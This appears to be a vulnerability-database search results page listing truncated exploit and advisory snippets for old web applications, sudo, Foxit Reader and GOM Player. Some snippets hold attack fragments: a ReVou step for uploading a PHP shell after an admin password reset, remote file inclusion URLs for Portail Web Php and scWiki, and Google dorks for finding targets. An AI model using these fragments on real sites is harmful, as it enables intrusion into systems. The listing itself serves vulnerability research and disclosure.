Lucene search
K

539 matches found

Exploit DB
Exploit DB
added 2011/04/22 12:0 a.m.39 views

360 Web Manager 3.0 - Multiple Vulnerabilities

Exploit Title: Multiple vulnerabilities in 360 Web Manager 3.0 Google Dork: "Powered by 360 Web Manager 3.0" Date: 15/04/2011 Author: Ignacio Garrido Contact: [email protected] Software Link: www.360webmanager.com Version: v3.0 Tested on: Linux 2.6.18 Vulnerability description: 360 Web Manager 3....

7.4AI score
Exploits0
seebug.org
seebug.org
added 2011/04/01 12:0 a.m.14 views

GOM Player '.avi'文件远程拒绝服务漏洞

Bugtraq ID: 47087 GOM Player是一款流行的媒体播放器。 GOM Player不正确处理'.avi'文件,远程攻击者可以构建恶意文件,诱使用户解析,触发缓冲区溢出,成功利用漏洞可以以应用程序安全上下文执行任意代码。 GRETECH CORP. GOM Player 2.1.28 5039 厂商解决方案 目前没有详细解决方案提供: http://www.winamp.com/ filepath = "C:\GOM Player 2.1.28.5039 - AVI DoS.avi" f = openfilepath, "wb" poc =...

6.9AI score
Exploits0
Packet Storm
Packet Storm
added 2010/08/13 12:0 a.m.75 views

CA Oneview Monitor DoSave.jsp Path Manipulation

Minded Security Labs: Advisory MSA100410 CA Oneview Monitor "DoSave.jsp" path manipulation Tested Versions: This advisory is intended for CA Netegrity Siteminder Policy Manager 6.x with Netegrity Oneview monitor installed. Minded Security ReferenceID: MSA100410 Credits: Discovery by Giorgio Fedon...

Exploits0
Packet Storm
Packet Storm
added 2010/08/13 12:0 a.m.38 views

Liferay Calendar exportFileName Path Manipulation

Minded Security Labs: Advisory MSA261009 Liferay Calendar "exportFileName" path manipulation Tested Versions: Liferay Enterprise Portal 4.4.2, other versions may also be affected. Minded Security ReferenceID: MSA261009 Credits: Discovery by Stefano Di Paola of Minded Security stefano.dipaola at...

Exploits0
securityvulns
securityvulns
added 2010/04/22 12:0 a.m.5149 views

sudoedit local privilege escalation through PATH manipulation

Security Advisory @ Mediaservice.net Srl 02, 19/04/2010 Data Security Division Title: sudoedit local privilege escalation through PATH manipulation Application: sudo = 1.7.2p5 Platform: Linux, maybe others Description: A local user with permission to run the sudoedit pseudo-command can gain root...

6.9CVSS8.3AI score0.01125EPSS
Exploits3
Cvelist
Cvelist
added 2010/04/20 3:0 p.m.25 views

CVE-2010-1165

Atlassian JIRA 3.12 through 4.1 allows remote authenticated administrators to execute arbitrary code by modifying the 1 attachment aka attachments, 2 index aka indexing, or 3 backup path and then uploading a file, as exploited in the wild in April 2010...

7.3AI score0.04436EPSS
Exploits0References8
Packet Storm
Packet Storm
added 2010/04/20 12:0 a.m.61 views

Sudo 1.7.2p5 Local Privilege Escalation

Security Advisory @ Mediaservice.net Srl 02, 19/04/2010 Data Security Division Title: sudoedit local privilege escalation through PATH manipulation Application: sudo Maurizio Agazzini Vendor Status: sudo team notified on 26/03/2010 CVE Candidate: The Common Vulnerabilities and Exposures project h...

6.9CVSS0.3AI score0.01125EPSS
Exploits3
myhack58
myhack58
added 2009/08/21 12:0 a.m.13 views

DedeCMS V5. 3 exp-vulnerability warning-the black bar safety net

Delete the Site any file. 2. Proof absolute path The impact of the system = DedeCMS V5. 3 1. Delete any file. Registration of normal users...feel free to find a place to upload an attachment it is OK. Part of the code: Copy the code form name="form1" action="http:// 网站 地址...

7.1AI score
Exploits0
Packet Storm
Packet Storm
added 2009/03/26 12:0 a.m.24 views

BlogPlus 1.0 Local File Inclusion

--:local file include:-- --------------------------------- script:blog+ v1.0 ---------------------------------------------- download from:http://www.ziddu.com/download/3151643/blogplusv1.0final.zip.html ----------------------------------------------...

Exploits0
Cvelist
Cvelist
added 2009/03/10 8:0 p.m.36 views

CVE-2009-0837

Stack-based buffer overflow in Foxit Reader 3.0 before Build 1506, including 1120 and 1301, allows remote attackers to execute arbitrary code via a long 1 relative path or 2 absolute path in the filename argument in an action, as demonstrated by the "Open/Execute a file" action...

7.9AI score0.75781EPSS
Exploits2References8
seebug.org
seebug.org
added 2009/02/14 12:0 a.m.22 views

Ewebeditor2.8.0最终版删除任意文件漏洞

eWebEditor是基于浏览器的、所见即所得的在线HTML编辑器。她能够在网页上实现许多桌面编辑软件(如:Word)所具有的强大可视编辑功能。WEB开发人员可以用她把传统的多行文本输入框TEXTAREA替换为可视化的富文本输入框,使最终用户可以可视化的发布HTML格式的网页内容。eWebEditor!已基本成为网站内容管理发布的必备工具! 此漏洞存在于Example\NewsSystem目录下的delete.asp文件中,这是ewebeditor的测试页面,无须登陆可以直接进入,看这些代码: ‘ 把带”|”的字符串转为数组 Dim aSavePathFileName...

7.1AI score
Exploits0
Packet Storm
Packet Storm
added 2009/01/21 12:0 a.m.27 views

Ninja Blog 4.8 Information Disclosure

Vendor: http://ninjadesigns.co.uk Versions: Ninja Blog 4.8 May also affect earlier versions Credit: Danny Moules Critical: Yes See PUSH 55 Advisory at http://www.push55.co.uk/index.php?s=ad&id=6 ---- Due to insufficient validation of client-side data, we can alter the path of files to be read to ...

7.4AI score
Exploits0
seebug.org
seebug.org
added 2009/01/19 12:0 a.m.67 views

Ninja Blog 4.8 Remote Information Disclosure Vulnerability

No description provided by source. Vendor: http://ninjadesigns.co.uk Versions: Ninja Blog 4.8 May also affect earlier versions Credit: Danny Moules Critical: Yes See PUSH 55 Advisory at http://www.push55.co.uk/index.php?s=ad&id=6 ---- Due to insufficient validation of client-side data, we can alt...

7.1AI score
Exploits0
0day.today
0day.today
added 2009/01/19 12:0 a.m.23 views

Ninja Blog 4.8 Remote Information Disclosure Vulnerability

Exploit for unknown platform in category web applications ========================================================== Ninja Blog 4.8 Remote Information Disclosure Vulnerability ========================================================== Vendor: http://ninjadesigns.co.uk Versions: Ninja Blog 4.8 May...

7.1AI score
Exploits0
Packet Storm
Packet Storm
added 2009/01/12 12:0 a.m.18 views

Silentum Uploader 1.4.0 File Deletion

Vendor: http://hypersilence.net Versions: Silentum Uploader 1.4.0 May also affect earlier versions Credit: Danny Moules Critical: Yes See PUSH 55 Advisory at http://www.push55.co.uk/advisories.php?id=2 ---- Due to insufficient validation of client-side data, we can alter the path of files to be...

7.4AI score
Exploits0
0day.today
0day.today
added 2009/01/11 12:0 a.m.18 views

Silentum Uploader 1.4.0 Remote File Deletion Exploit

Exploit for unknown platform in category web applications ==================================================== Silentum Uploader 1.4.0 Remote File Deletion Exploit ==================================================== Vendor: http://hypersilence.net Versions: Silentum Uploader 1.4.0 May also affec...

7.1AI score
Exploits0
Packet Storm
Packet Storm
added 2008/12/30 12:0 a.m.46 views

ReVou Twitter Clone Password Changer

=== NOTES === . Reset pwd, login as ADMIN, use this path to upload your php-shell-script: http://site.tld/revou/adminlogin/index.php?id=dbimport . your file is here: http://site.tld/revou/dbbackup/shell.php === GGL-DORKS === "Joined ReVou" "Tell the world what you're doing at this moment!" "days...

7.4AI score
Exploits0
seebug.org
seebug.org
added 2008/02/25 12:0 a.m.20 views

Portail Web Php <= 2.5.1.1 Multiple Inclusion Vulnerabilities

No description provided by source. Portail Web Php = 2.5.1.1 Multiple Remote/Local File Inclusion Vulnerabilities http://surfnet.dl.sourceforge.net/sourceforge/portail-web-php/PwP2.5.1.1.rar POC : I- Remote File Inclusion /PwP2.5.1.1/template/Vert/index.php?sitepath=http://localhost/020.txt...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2007/11/04 12:0 a.m.11 views

scWiki 1.0 Beta 2 (common.php pathdot) Remote File Inclusion Vuln

No description provided by source. scWiki 1.0 Beta 2 common.php pathdot Remote File Inclusion Vulnerability http://heanet.dl.sourceforge.net/sourceforge/sc-wiki/scwikibeta2.zip POC : /includes/common.php?pathdot=Shell sebug.net...

7.1AI score
Exploits0
CVE
CVE
added 2007/05/01 10:0 a.m.39 views

CVE-2007-2412

The CVE-2007-2412 issue affects Seir Anphin, specifically the modules/file.php component. It describes a directory traversal vulnerability where an attacker can obtain sensitive information via the a[filepath] parameter by manipulating file paths with .. (dot dot). The core concern is that a user...

7.8CVSS6.1AI score0.0168EPSS
Exploits0References4Affected Software1
Rows per page
Query Builder